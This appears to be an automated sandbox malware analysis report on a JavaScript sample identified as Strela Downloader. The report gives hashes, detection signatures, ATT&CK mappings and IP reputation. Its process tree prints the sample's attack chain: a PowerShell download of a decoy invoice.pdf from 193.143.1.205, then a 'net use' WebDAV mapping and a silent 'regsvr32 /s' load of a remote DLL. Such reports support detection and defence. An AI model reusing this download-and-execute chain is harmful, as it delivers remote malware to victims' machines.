Windows
Analysis Report
7893194593206114961.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7784 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\78931 9459320611 4961.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7836 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\112 7263141701 1.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7888 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 8100 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7544 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 1244 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1640,i ,134723629 0612627993 9,79521495 6599374656 1,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1364 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
3% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587960 |
Start date and time: | 2025-01-10 19:48:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 3s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 7893194593206114961.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 162.159.61.3, 172.64.41.3, 2.23.242.162, 2.16.168.105, 2.16.168.107, 23.209.209.135, 199.232.210.172, 23.40.179.63, 23.40.179.35, 192.168.2.9, 52.149.20.212, 23.195.92.153
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
13:49:10 | API Interceptor | |
13:49:16 | API Interceptor | |
13:49:16 | API Interceptor | |
13:49:29 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4932096321489788 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Zta7:cJhXC9lHmutpJyiRDeJ/aUKrDgnm9 |
MD5: | 730FD62D5F0DC1C83D501F5230558B0E |
SHA1: | 611978D2D51F7292BAF8C4A24308B02221474DC6 |
SHA-256: | 0666CF9BD3264930AC94369FF28B7F0501C3D376F01786EB68E51E53BA86A027 |
SHA-512: | 8B90584237B7F1C8BDBB2FC72C04435906F5D03974EEC13831B2E21887AECED98DDF54D6442E0F952852FF0F6255F9E20864A4CCC4F84A42C354B1B032A37E69 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216896658297852 |
Encrypted: | false |
SSDEEP: | 1536:zSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:zazaNvFv8V2UW/DLzN/w4wZi |
MD5: | 5B3DC18F3FA02CC97B4210C8FCB44E80 |
SHA1: | B26957BA60FB87CAF3668AAE5003840A379CE2F1 |
SHA-256: | 5F84CD017B36E98410E819D15EFAFD0B7E5F7736AF719361505F87DFC24DD8B5 |
SHA-512: | 67AE184F92F2E3029BF8B51EC0B6E62AF881C2B8CE2C2943A6D65ED961CFA68CB7D470AE9D99980F230E98C526FD1F54D309681299467C5321921D7A3F299E3F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08119994988837453 |
Encrypted: | false |
SSDEEP: | 3:81KYeCh2Tew/fgsCrZClW/tEEtAll+SHY/Xl+/rQLve:81KzJewfgs3GaEtAAS4M |
MD5: | 498D89D0DA9184FFA7BC32210AFA0CB9 |
SHA1: | 0DB18B0269525B7493C656E00126721C355AE035 |
SHA-256: | AE11DF0BDBD351D056E02A7F79E56885EE5D91B060FE04FFAF10E1B7BCBDCE59 |
SHA-512: | 0C9689D883A2D579B4B758B1FA7A07CCA6D680CA46E6488E6C986F953C332B2286374F28DDCBE40764CFDD1352CB9EB1DC29211950CE78183F995E7736593973 |
Malicious: | false |
Preview: |
